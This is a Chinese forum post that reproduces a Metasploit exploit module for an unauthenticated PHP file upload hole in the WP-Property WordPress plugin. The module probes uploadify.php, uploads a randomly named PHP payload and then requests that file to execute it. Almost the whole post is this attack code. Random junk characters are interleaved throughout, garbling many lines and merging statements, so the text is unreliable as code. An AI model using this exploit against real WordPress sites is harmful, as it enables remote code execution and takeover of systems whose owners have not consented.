WordPress WP-Property PHP 文件上传漏洞* q1 g( p# Z) u6 J
# c. C& q% o" h ## # This file is part of the Metasploit Framework and may be subject to; ^* A# o" x+ n
5 H- O2 l3 q1 w) D8 m l5 T0 c# redistribution and commercial restrictions. Please see the Metasploit" v% l% N0 ^2 N% w8 p# s+ Q
! }' L* F& O% J# v9 T4 h
# Framework web site for more information on licensing and terms of use.
E9 O* C0 ?; m, j T' B1 `& `* Y' M+ g: l& T5 n
# http://metasploit.com/framework/ ##" `1 ^7 T4 I$ O3 R( n3 ?8 y
9 B% ~0 b. }! w9 W; L' a
* K' m) d% E1 L3 G" X2 K
; j3 A! b' ]. u& p ' f8 v# h, w* k( B
$ W, G- u y$ y$ u. h. O( Jrequire 'msf/core'
1 G7 H2 R8 }! Z! ]5 W$ [& E5 v% erequire 'msf/core/exploit/php_exe'
% u6 I0 o8 x4 m/ Y- z
' ~9 B5 M: D& Q# W$ ~ a( yclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
3 Q5 H7 ?' g" w0 B7 X'Description' => %q{
6 Z1 H0 m0 h& I1 kThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>" X' {5 K% \" r7 J. T
[
U0 w& D4 @( z0 b" y& v'Sammy FORGIT', # initial discovery' v) o& s% r, h X2 E; I% n
'James Fitts <fitts.james[at]gmail.com>' # metasploit module# y0 {2 P0 Y6 t# r" B2 T
],% V+ p, ]8 d& }7 w; N) S
'License' => MSF_LICENSE,+ J4 y( F7 S) |& c. H. E/ S# m
'References' =>3 f: x( e. m3 `" V' V
[. e1 G. B9 B. w' W. ^
[ 'OSVDB', '82656' ],& A1 j: E$ N: u2 }
[ 'BID', '53787' ],) v' X* N% n- s
[ 'EDB', '18987'],
* N+ J9 u9 U+ d6 ?4 z[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
! S. Q# O; f1 u9 |0 M/ p# v) s],2 i9 q9 t5 d+ |6 _/ @
'Payload' =>
9 u" d4 x, N. y! v{
3 z7 a% @: L. J7 A'BadChars' => "\x00",# j" o" `6 ^6 i2 H5 G+ A
},
) r, Z/ ^2 N9 h) Z' I: n'Platform' => 'php',6 _" j& M7 D6 B. V4 T0 l" X X
'Arch' => ARCH_PHP,
' U) t8 X( |& p) N9 S$ J2 O n4 Q'Targets' =>: O7 E0 l$ n* Q0 F! S% s& ?
[
6 j' J7 T8 a9 H. d4 E, f9 W[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
( @) V$ M# H2 I( [[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
- Y: K& @+ W$ X* i5 w],
1 \! f* O; @& A( z6 C/ Y/ k& p. k. K( X'DefaultTarget' => 0,
& a; D0 M) s( Y9 o4 z'DisclosureDate' => 'Mar 26 2012')). m# B a# d7 k+ L, Z8 z
$ r, v$ U& k! P9 H
register_options(* V# y/ |5 E6 `1 a
[+ h- M* {: t6 g4 d7 ]
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])) t; \0 Y0 {# }
], self.class); D9 A; L$ Z2 k# j: z* \4 G
end
, \" V6 e1 n; Y7 t
" L4 O! ~' Y+ v% Z- w: Y1 Z$ Xdef check
0 {3 ^! d! \) X1 p- G& F' s$ N% |uri = target_uri.path+ Q7 L/ A; o! n3 E e
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
8 g# _* C4 a/ ~" \% M'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
; t# a5 x5 [+ E, s9 F$ |}), S2 m8 o) B" n% R: H% k0 R4 g
$ i+ i4 |) n0 I, fif not res or res.code != 200( _7 {" e5 s5 o2 }
return Exploit::CheckCode::Unknown* V' S, O# K. T6 s
end
0 Q5 b# A' z8 C5 [5 M8 U4 u G1 Z% Q7 c, v
return Exploit::CheckCode::Appears+ `8 l- g/ p/ O* ?
end& H. X+ ^% w; |4 R% D/ |2 d
$ p- P. j" O/ s `def exploit
/ V9 N; Y2 H8 ouri = target_uri.path3 z) Z% W6 Z8 a" B% D
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true). D, O& I5 Y$ O* Z+ E# E9 B3 @
( f; W, Y7 T0 v4 {, }) L, qdata = Rex::MIME::Message.new
1 b2 v% G9 D" Z( M5 w, ^: ~data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
- z3 x) W+ t' [$ a7 ^6 fdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
8 e3 y2 m. @. p( `1 B) [post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')/ A/ n8 _) {2 g9 m$ e6 `( x$ G) d9 ^
3 M+ B' p. x/ T; N* i5 uprint_status("#{peer} - Uploading payload #{@payload_name}")
* a! s( F1 B* Q! U* T4 |* Xres = send_request_cgi({, y2 t+ Z) O* f+ H, f3 W7 x
'method' => 'POST',
9 h/ f( ^1 I+ y& X. }3 r6 `'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"," {+ x" C0 G" Z
'ctype' => "multipart/form-data; boundary=#{data.bound}",! L9 X/ B3 t8 q3 X2 q
'data' => post_data6 ~, T9 g$ C7 J6 h! C
})0 Z E; F9 p, L8 R ^# {4 H+ E
+ i3 G8 L% L( J& m6 Gif not res or res.code != 200 or res.body !~ /#{@payload_name}/ D4 m/ m i* V9 u m- @
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")$ c, J- _/ b! M# r' d
end
. {1 K5 H" F3 a7 J% v
0 y% `$ D- Y7 U" O, a" tupload_uri = res.body
; D, @9 |8 z( ?: M6 u7 Q
0 ?1 R3 j7 O. I7 u% | f9 y Eprint_status("#{peer} - Executing payload #{@payload_name}")/ y* A) p4 R* [6 L& k
res = send_request_raw({' W D5 d7 R$ h
'uri' => upload_uri,( z; E; ? _; \
'method' => 'GET'
! S, _$ h9 V& T; s}). T" {; z, Y& o% r( L% _) ?
end- H% g9 u1 v9 F' J/ r0 C
end
5 n `; O6 ]6 y" d
: N+ I& Y$ ]7 G. l" |不要问我这写的是什么 怎么利用 我是说msf.
$ O% F" E9 J/ G- S
' Y' a1 @' @6 T+ R6 N! D3 p |
发表于 2013-1-4 19:51:30
收藏
支持
反对